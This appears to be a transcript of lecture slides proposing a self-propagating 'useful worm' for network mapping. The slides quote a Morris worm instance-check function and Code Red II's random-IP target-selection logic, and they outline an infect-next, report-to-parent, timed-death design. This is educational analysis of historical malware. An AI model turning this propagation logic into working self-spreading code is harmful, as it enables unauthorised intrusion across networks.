Transcript The Worm Works For You

The Worm Works For You
Matt Weaver
CS591
Introduction
The Shockwave Rider
PARC
Town Crier
Vampire
Goal
Use a worm to measure bandwidth and
map a network.
Analyze classic worms.
Morris
Code Red
Determine the algorithm and architecture
of a “useful worm”
Morris Mistake
Listen on a port: failure leads to infection.
Machines were reinfected.
Morris











































checkother()
{
int s, l8, l12, l16, optval;
struct sockaddr_in sin;
/* 0x57d0 */
/* 16 bytes */
optval = 1;
if ((random() % 7) == 3)
return;
/* 612 */
s = socket(AF_INET, SOCK_STREAM, 0);
if (s < 0)
return;
/* Make a socket to the localhost, using a link-time specific port */
bzero(&sin, sizeof(sin));
/* 16 */
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr(XS("127.0.0.1")); /* <other_fd+4> */
sin.sin_port = 0x00005b3d;
if (connect(s, &sin, sizeof(sin)) < 0) {
close(s);
} else {
l8 = MAGIC_2;
if (write(s, &l8, sizeof(l8)) != sizeof(l8)) {
close(s);
return;
}
l8 = 0;
if (xread(s, &l8, sizeof(l8), 5*60) != sizeof(l8)) {
close(s);
return;
}
if (l8 != MAGIC_1) {
close(s);
return;
}
l12 = random()/8;
if (write(s, &l12, sizeof(l12)) != sizeof(l12)) {
close(s);
return;
}
/* ??? */
/* Magic number??? */
Code Red II
Mountain Dew
Code Red utilized a clever distribution
scheme: not just the random IP trick.
Code Red II (Continued)



























mtable[] = { 0xFFFFFFFF
// go anywhere
0xFFFFFF00
// stay in class A
0xFFFFFF00
// stay in class A
0xFFFFFF00
// stay in class A
0xFFFFFF00
// stay in class A
0xFFFF0000
// stay in class B
0xFFFF0000
// stay in class B
0xFFFF0000 }; // stay in class B
# start with a random number that will be our new IP address.
# I presume the random number generator is "random enough".
newip = random();
# zero the UPPER octets of the random IP, which means that the
# random number won't participate in the class A or class B
# address
mask = mtable[ random() & 0x7 ]; // locate a mask
newip &= mask;
// throw away rightmost bits
# flip the mask around to operate on LOWER octets
mask = ~mask;
// flip the mask around
myip = LOCAL_IP & mask;
// throw away leftmost bits
# newip contains the upper bits
# myip contains the lower bits
# join them:
newip |= myip;
if (newip starts with 127) try again // localhost
if (newip starts with 224) try again // multicast
if (newip matches LOCAL_IP) try again
Connect to "newip" and try to infect
A New Worm
Network
Target
Target
Target
Root
Target
Logic
 Write a text file (C on Win
~ on Unix)
 Talk to parent.
 Find next machine.
 Infect next.
 Talk to parent.
 Timed death.
 Forced death (success).
Parent
Child
Next Target
Concerns
Running amok/re-infection.
Termination
The Root Machine
Compiles UDP payload information from
child instances.
Maps network.
Dynamically generate viral payload
(binary).
Provide control values.
Conclusion
Master’s Project: get it working safely.
Sources
 Aleph One. “Smashing the Stack for Fun and Profit”.
Phrack 49.
 CERT. http://www.cert.org/
 Eren, Sinan. “Smashing the Kernel Stack for Fun and
Profit.” Phrack 60.
 Erickson, Jon. Hacking: The Art of Exploitation. No
Startch Press, 2003.
 Morris, Robert. Morris Worm Source Code.
http://www.foo.be/docs-free/morris-worm/worm/
 Wikipedia, “Computer Worm”.
http://en.wikipedia.org/wiki/Computer_worm
 Wiedl, Steve. Unix Wiz. http://www.unixwiz.net/